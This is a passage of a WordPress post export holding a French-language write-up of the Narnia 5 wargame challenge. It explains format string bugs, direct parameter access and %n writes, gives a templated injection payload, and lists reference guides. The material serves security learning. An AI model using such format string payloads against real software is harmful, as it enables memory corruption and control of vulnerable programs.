Parameters<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-76a2bd7 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"76a2bd7\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-71aabb8\" data-id=\"71aabb8\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c4330ab elementor-widget 
elementor-widget-text-editor\" data-id=\"c4330ab\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p style=\"font-size: 18px;line-height: 27px\">According to the guide&nbsp;<a href=\"https:\/\/cs155.stanford.edu\/papers\/formatstring-1.2.pdf\" style=\"font-size: 18px;font-weight: var( --e-global-typography-text-font-weight );font-family: var( --e-global-typography-text-font-family ), Sans-serif\">formatstring-1.2.pdf (stanford.edu)<\/a><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">, we can use a &#8220;<\/span><i style=\"font-size: 18px;color: var( --e-global-color-text );font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\">stack popping<\/i><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">&#8221; method that makes it possible to address<\/span><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text )\"><span style=\"font-size: 18px;font-weight: 700\">&nbsp;a stack parameter directly<\/span><\/span><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">&nbsp;(<\/span><i style=\"font-size: 18px;color: var( --e-global-color-text );font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\">Direct Parameter Access<\/i><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">).<\/span><\/p><p style=\"font-size: 18px;line-height: 27px\"><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">This means placing&nbsp;<\/span><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text )\"><span style=\"font-size: 18px;font-weight: 700\">an element directly<\/span><\/span><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">&nbsp;on the stack.<\/span><\/p><p style=\"font-size: 18px;line-height: 27px\"><span style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">This access is done with the &#8216;$&#8217; qualifier.<\/span><\/p><p style=\"font-size: 18px;line-height: 27px\">Reading the guide, we understand that&nbsp;<code style=\"font-size: 18px\">%1$n<\/code>&nbsp;actually writes the last argument entered to a memory location.<\/p><p style=\"font-size: 18px;line-height: 27px\">Indeed, the 1 indicates the first argument passed after the format string.<\/p><p style=\"font-size: 18px;line-height: 27px\">The $n is the equivalent of %n. It is a format specifier, used to write the passed argument to the address specified beforehand.&nbsp;<\/p><p style=\"font-size: 18px;line-height: 27px\">We also need a memory location and a piece of data to write onto the stack.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-c66cc2e elementor-widget elementor-widget-image\" data-id=\"c66cc2e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"570\" height=\"301\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/06\/narna.5V2.png\" class=\"attachment-large size-large wp-image-877\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/06\/narna.5V2.png 570w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/06\/narna.5V2-300x158.png 300w\" sizes=\"(max-width: 570px) 100vw, 570px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-7bee9ed elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"7bee9ed\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5c86d6b\" data-id=\"5c86d6b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e3251de elementor-widget elementor-widget-text-editor\" data-id=\"e3251de\" 
data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p style=\"font-size: 18px;line-height: 27px\"><span style=\"font-size: 18px;color: var( --e-global-color-text );font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\">Ainsi, on se retrouve avec une injection de ce format l\u00e0 :<\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3af5aa4 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3af5aa4\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-11bf3d2\" data-id=\"11bf3d2\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f80d499 elementor-widget elementor-widget-code-highlight\" data-id=\"f80d499\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>$(python2 -c 'print(\"adresse\")')%Nx%1\\$n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section 
elementor-element elementor-element-2551c89 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"2551c89\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-6875daf\" data-id=\"6875daf\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-322d8d0 elementor-widget elementor-widget-text-editor\" data-id=\"322d8d0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>O\u00f9 N est un chiffre hexad\u00e9cimal (x) (l&#8217;argument) \u00e0 \u00e9crire \u00e0 l&#8217;adresse &#8220;<b><code>&lt;adresse&gt;\"<\/code><\/b><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-53e71cb elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"53e71cb\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4a0f865\" data-id=\"4a0f865\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4325920 elementor-widget elementor-widget-heading\" data-id=\"4325920\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div 
class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Conclusion<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9570cf5 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9570cf5\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-0d05780\" data-id=\"0d05780\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4ffd796 elementor-widget elementor-widget-text-editor\" data-id=\"4ffd796\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>J&#8217;ai trouv\u00e9 ce challenge tr\u00e8s int\u00e9ressant, il se penche sur un nouveau type de vuln\u00e9rabilit\u00e9s, encore jamais abord\u00e9 au cours de ce wargame.<\/p><p>Il existe de nombreuses fa\u00e7on diff\u00e9rentes de r\u00e9soudre ce challenge.<\/p><p>Il m&#8217;a sembl\u00e9 mystique au d\u00e9but, complexe \u00e0 prendre en main, mais gr\u00e2ce \u00e0 de nombreuses documentations et guides, il est possible d&#8217;en venir \u00e0 bout \ud83d\ude0a.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9bbc622 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9bbc622\" 
data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7282654\" data-id=\"7282654\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b8c98bd elementor-widget elementor-widget-heading\" data-id=\"b8c98bd\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Ressources<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-46c5085 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"46c5085\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4dcbc36\" data-id=\"4dcbc36\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f2b412a elementor-widget elementor-widget-text-editor\" data-id=\"f2b412a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><a href=\"https:\/\/owasp.org\/www-community\/attacks\/Format_string_attack\">Format string attack | OWASP Foundation<\/a><\/p><p><a 
href=\"https:\/\/medium.com\/@gurdeeps158\/exploit-format-string-vulnerability-in-printf-6740d9ff057e\">Exploit format String vulnerability in printf() | by GURDEEP SINGH | Medium<\/a><\/p><p><a href=\"https:\/\/cs155.stanford.edu\/papers\/formatstring-1.2.pdf\">formatstring-1.2.pdf (stanford.edu)<\/a><\/p><p><a href=\"https:\/\/www.exploit-db.com\/docs\/english\/28476-linux-format-string-exploitation.pdf\">Format Strings Exploitation Tutorial (exploit-db.com)<\/a><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Nous sommes de retour avec le 6\u00e8me challenge de cette s\u00e9rie ! Celui-ci va nous permettre de d\u00e9couvrir de nouvelles vuln\u00e9rabilit\u00e9s, encore jamais vu dans les challenges Narnia : les formats strings ! D\u00e9couverte #include #include #include int main(int argc, char **argv){ int i = 1; char buffer[64]; snprintf(buffer, sizeof buffer, argv[1]); buffer[sizeof (buffer) -&hellip; <br \/> <a class=\"button small blue\" href=\"https:\/\/mindshield.eu\/index.php\/2023\/06\/01\/narnia5\/\">Read 
more<\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[8,10,11],"class_list":["post-595","post","type-post","status-publish","format-standard","hentry","category-narnia_challenges","tag-challenge","tag-exploit","tag-formatstring"],"_links":{"self":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/595","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/comments?post=595"}],"version-history":[{"count":74,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/595\/revisions"}],"predecessor-version":[{"id":905,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/595\/revisions\/905"}],"wp:attachment":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/media?parent=595"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/categories?post=595"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/tags?post=595"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}